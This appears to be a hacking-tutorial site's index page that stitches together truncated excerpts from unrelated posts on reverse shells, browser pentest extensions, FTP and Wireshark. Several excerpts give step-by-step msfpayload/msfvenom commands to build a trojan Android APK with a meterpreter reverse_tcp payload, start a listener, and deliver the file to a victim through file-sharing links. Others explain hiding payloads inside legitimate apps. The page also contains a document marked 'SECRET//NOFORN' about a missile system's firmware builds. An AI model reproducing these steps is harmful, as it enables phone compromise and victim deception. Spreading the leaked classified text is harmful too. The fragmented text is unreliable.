DARK ACADEMY - LEARN HOW TO HACK SYSTEM, WEB, API'S, IOT, ANDROID/IOS - FREE ETHICAL HACKING CLASS

Creating a Remote Reverse Shell Tunnel Attackers use remote shells to connect to their victim's remote machine using an interactive shell. Remote shells enable an attacker to execute OS commands as though he were sitting in front of the victim's machine, and execute commands on behalf of the victim's identity on which the shell's process is running. Telnet and RSH are two examples of “legitimate” services that enable remote clients to connect to another machine and execute commands via the shell's console. Those “direct” or “forward” remote shells are established by the client to the server (the server must, of course, listen to those requests and decide whether to accept them). From an attacker's point of view, it is beneficial to be able to connect to a remote machine and execute OS-level commands. After breaking into a machine, the attacker can set a remote shell server on the machine so that he can establish connections to the machine at a late

1. Web Developer  is a Google Chrome extension that adds a tool bar with various web development tools in Chrome. With these tools, users can perform various web development tasks. This extension helps analyzing web application elements like HTML and JS..                                                                   Add Web Developer Extension in Chrome here    2. Firebug Lite for Google Chrome  provides a rich visual environment to analyze HTML elements, DOM elements and other Box Model Shading. It also provides live CSS editing. It helps in analyzing how an application is working on the client’s side.Add Firebug Lite to Google Chrome: 3. d3coder, is another nice Google Chrome extension that helps penetration testers. It enables us to encode and decode selected text via context menu. Thus it reduces the time to encode and decode strings by using separate tools. This extension can perform a wide range of functions. See the list below: Timestamp decoding rot13 en-/decodi

Step 1      Fire-Up Kali:   Open a terminal, and make a Trojan .apk   You can do this by typing :   msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)   Step 2      Open Another Terminal: Open another terminal until the file is being produced. Load metasploit console, by typing : msfconsole Step 3      Set-Up a Listener: After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external) Step 4      Exploit! At last type: exploit t o start the listener. Copy the application that you made (Upgrader.apk) from the root folder, to you android phone. Then send it using Uploading it to Dropbox or any sharing website (like: www.speedyshare.com ). Then send the link that

Building the Protego Images  SECRET//NOFORN Building the Protego Images Introduction This document describes the builds required for a complete Protego system. Processor images built for the Protego system: There are seven build images created for a complete Protego system. The following build images are unique for each Collar, Tube, and Missile set and the keys must match: 1) P1.X.production.hex 2) P2.X.production.hex 3) P3.X.production.hex The following are used on the Deployment Box for configuration control of any Protego system: 4) P4.X.production.hex 5) P5.X.production.hex The following build images are used when reprogramming the MP processor: 6) P1_S.X.production.hex 7) P2_ Maintenance.production.hex Locations of images: 1) P1 - Master Processor (MP), Master Processor on PWA 2) P1_S - Master Processor (MP), Slave Processor on PWA 3) P2 - Tube Smart Switch (TSS) Processor 4) P3 - Missile Smart Switch (MSS) Processor 5) P4 - Deployment Box Slave Processor on PWA 6) P5 - Deploymen

On the kali linux terminal type - (root💀diago)-[~]# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.*.* LPORT=4444 R > Nasha.apk   [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload [-] No arch selected, selecting arch: dalvik from the payload No encoder specified, outputting raw payload Payload size: 10184 bytes PD�>T�����PndroidManifest.xml��KoSGǏ�@�qB�1y@ O��@��@��"��]T�`B�▒+8��Z������� U�K>@�]tQU�˪� uY� S�V{�B��F�E*~&B��n�,tz��                       =�����^@?B�@B3���2�S��g�7ë"�@��(��>�^B�a�<��YMtz��"�z����z�]�!� �j� Nh���k�f�              �} }                  ��^A�uD����=��_�����7���P=za�v�m�m�<~��r�$C���K▒q%����}���T@�]�����K����=�z��-FM��s\)E{��MK?��G ��o�~��3��I�?��V�"ε2�qԏ�te        ���;�� �$jR�<�ef�#5�=z�T�8-#�5����.��h��3�~��O��t       ��i��^��ۼ���5��~%S,��C-C> \M?s�KI�az_/��[vγ�▒��▒�0�ȸ�2���E��,^�9�Ĕ�2z�▒��d�_��F*�z���lI򈘹�±,����*���7�eZO� X^�^�H�����X{�j�7ތY�u���l���ά�K�s�$��+&g

Embed a Metasploit Payload in an Original .Apk File | Part 2 – Do It Manually Hi guys, I'm here again with my second tutorial, as I promised. Metasploit's flagship product, the Meterpreter, is very powerful and an all-purpose payload. Once installed on the victim machine, we can do whatever we want to their system by sending out commands to it. For example, we could grab sensitive data out of the compromised system. The Meterpreter payload also comes as an installable .apk file for Android systems. Great! Now we can use Metasploit to compromise Android phones also. But if you have tried out these payloads you would know that they do not look convincing. No one in their right mind is going to install and run such an app, which apparently does nothing when it is opened. So how are we going to make the victim run the payload app in their phone? One of the solutions is that you can embed the payload inside another legitimate app. The app will look and behave exactly as the original

 Injecting Metasploit Payloads into Android Applications It is possible to use a legitimate Android application as a Trojan in order to exploit the actual device of the user. The reasons of why this test is important in every android security assessment is because it would allow the penetration tester to discover if there are certain protections around the binary in place. If there are not and the application could be trojanized by a malicious attacker then the client should be aware. The process of injecting Metasploit payloads into Android applications can be done both manually and automatically. This post will examine the automated process. However if in an engagement time is not a factor then the manual method should be considered. Payload Generation Before anything else the payload needs to be generated that it will be used in order to compromise the mobile device. Metasploit Framework could be used for this activity since it can produce a payload and then extract it as APK file.

FTP, by itself, is not a reliable way to exchange sensitive business information because it is prone to security attacks. Serv-U MFT Server supports FTP, FTPS, SFTP and HTTP/S protocols for file transfer over IPv4 and IPv6 networks. Give it a try FTP (File Transfer Protocol) is a standard network protocol used to exchange files between computers on a private network or through the Internet. There are three ways in which FTP is commonly accessed: * Command-line FTP client. * Web browser. * Graphical FTP clients. The first two are straightforward methods that allow you to directly use a Web browser (such as Google Chrome, Firefox, Internet Explorer) or an FTP client application (such as FTP Voyager®) to connect to the FTP server to exchange files. Using the command-line interface, you need to enter a set of commands to send or receive files from other computers. Windows, Mac OS X, and Linux operating systems have built-in command-line clients that can be used for establishing an FTP conn

Wireshark Package Description Wireshark is the world’s foremost network protocol analyzer. It lets you see what’s happening on your network at a microscopic level. It is the de facto (and often de jure) standard across many industries and educational institutions. Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998. Wireshark has a rich feature set which includes the following: Deep inspection of hundreds of protocols, with more being added all the time Live capture and offline analysis Standard three-pane packet browser Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility The most powerful display filters in the industry Rich VoIP analysis Capture files compressed with gzip can be decompressed on the fly Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM,